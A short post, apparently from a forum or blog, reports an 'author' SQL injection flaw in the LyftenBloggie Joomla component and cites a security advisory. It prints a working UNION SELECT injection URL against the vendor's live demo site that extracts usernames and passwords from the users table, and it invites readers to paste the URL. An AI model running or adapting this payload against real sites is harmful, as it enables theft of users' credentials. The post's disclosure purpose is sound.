Been searching for the demo site and found that lyftenbloggie is vulnerable for "author" sql injection as posted in secunia website: http://secunia.com/advisories/37499/. This allows hackers to steal your users name and password using lyftenbloggie.
Copy and paste the following code in your browser for a demo:
http://demo.lyften.com/index.php?option=com_lyftenbloggie&author;=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users--
LyftenBloggie is a great and a promising component and hope lyften.com could fix it soon.
The complete detail of the vulnerability can be found at http://www.packetstormsecurity.org/0911-exploits/lyften-sql.txt